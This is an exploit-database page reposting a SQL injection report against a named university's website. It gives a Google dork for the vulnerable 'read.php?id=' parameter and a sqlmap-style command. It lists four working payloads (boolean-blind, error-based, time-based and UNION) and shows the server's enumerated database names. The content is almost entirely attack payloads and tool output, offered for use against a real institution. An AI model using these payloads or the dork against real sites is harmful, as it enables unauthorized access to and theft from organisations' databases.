Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

# Exploit Title: VASYL STEFANYK UNIVERSITY | SQL Injection Vulnerability
# Author: Emyounoone
# Date: 17/04/2021
# Tested On: Kali Linux
# Contact:
# Google Dork: read.php?id=


# Vulnerable Path:

# python3 --dbs --random-agent

Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7097=7097) THEN 1 ELSE (SELECT 4010 UNION SELECT 4511) END))

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 OR (SELECT 4232 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(4232=4232,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: id=1 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 24 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707171,0x59474b73796f7a6d4b66707a765662487349776548564c43526f6868596b446a4f587847704a7173,0x71706a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
available databases [7]:
[*] c3lib
[*] information_schema
[*] my
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

Copyright ©2021 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.